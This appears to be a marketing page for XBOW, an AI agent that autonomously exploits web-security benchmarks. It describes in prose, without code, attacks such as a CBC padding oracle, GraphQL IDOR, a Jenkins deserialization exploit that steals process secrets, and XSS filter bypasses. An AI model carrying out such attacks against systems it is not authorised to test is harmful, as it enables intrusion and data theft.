Boosting offensive security with AI
XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
PortSwigger Labs
PentesterLab Exercises
Novel Benchmarks
See XBOW at work
XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.
These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data, click here.
Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle
Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.
Copied to clipboard!
Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API
Even when we entirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site—finding one that holds the flag.
Copied to clipboard!
Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit
After a benchmark bug made this "Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but the compromised server as well. Its final solution—a Python program that exploits XML deserialization to deploy an embedded bash
script, stealing secrets from running processes' command lines—is a thing of beauty.
Copied to clipboard!
Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)
In this novel XBOW benchmark, XBOW detects one of the OWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by using HTML entities encoding.
Copied to clipboard!
Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—all without access to the tutorial given to human solvers.
Copied to clipboard!
Team
Security, AI, and Engineering
Nico Waisman
Head of Security
Albert Ziegler
Head of AI
Andrew Rice
Head of Engineering
Aqeel Siddiqui
Head of Operations
Brendan Coll
Research Engineer
Brendan Dolan-Gavitt
AI Researcher
Diego Jurado
Security Researcher
Ewan Mellor
Research Engineer
Fernando Russ
Research Engineer
Johan Rosenkilde
AI Researcher
Joel Noguera
Security Researcher
Thomas Bolton
AI Researcher
We are recruiting.
Email usBlog
Updates and opinions from the team
September 11, 2024 - By Nico Waisman
XBOW validation benchmarks: show me the numbers!
XBOW is currently making 104 benchmarks available to the public. This allows other security products, tools, and researchers to use and explore these benchmarks.
Read postAugust 5, 2024 - By Oege de Moor
XBOW now matches the capabilities of a top human pentester
Five professional pentesters were asked to find and exploit the vulnerabilities in 104 realistic web security benchmarks. The most senior of them, with over twenty years of experience, solved 85% during 40 hours, while others scored 59% or less. XBOW also scored 85%, doing so in 28 minutes. This illustrates how XBOW can boost offensive security teams, freeing them to focus on the most interesting and challenging parts of their job.
Read postJuly 30, 2024 - By Oege de Moor
Sequoia Capital leads $20M seed round in XBOW
XBOW scales offensive security through AI, boosting the work of pentesters, bug hunters and offensive security researchers. It autonomously solves 75% of web app security benchmarks. Sequoia Capital is leading a $20M seed round in XBOW.
Read postFrequently asked questions
Benchmarks
What do you consider a “benchmark”?
A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Many challenges in CTF contests do not qualify because they are brainteasers rather than reflecting a realistic web security scenario.
Where did XBOW get its collection of benchmarks?
XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources include leading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Some benchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.
The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?
The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks to have the same crisp success criterion which can be checked by our infrastructure. So we introduced a flag and a mechanism for returning it.
Could you provide more information about the novel XBOW benchmarks?
XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in any training data. The benchmarks are representative of many vulnerability classes, and varying degrees of difficulty.
Will the novel XBOW benchmarks be released?
Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarks to set a new standard for the evaluation of security tools.
How many benchmarks does XBOW have?
XBOW has collected a corpus of thousands of benchmarks, both for the purpose of evaluating performance, and for improving performance.
Where can I find more details about the benchmarks that XBOW solved?
We provide more details to back up the results reported on this website. See here for the benchmarks that were attempted, and which were solved.
Technology
How does the AI inside XBOW work?
It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Aside from general guidance that is identical for every task, the only directions given to XBOW are the basic benchmark description.
As a growing startup, this intellectual property is our main asset, so we cannot share the details.
Are the example traces shown edited?
The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.
Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?
Yes, we have run experiments by blanking out the descriptions and that works fine. Without flags as a goal, XBOW decides on its own when it has finished. You can prompt it to be more or less aggressive - for example, when it discovers a SQL injection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or just stop and report the core problem.
Is XBOW useful for everyone or does it require any sort of specific knowledge?
XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security or AI expert to use it—a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team, combining such security expertise with AI and engineering skills.
Responsible AI
How will you ensure your technology won't be misused?
We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone application outside our control.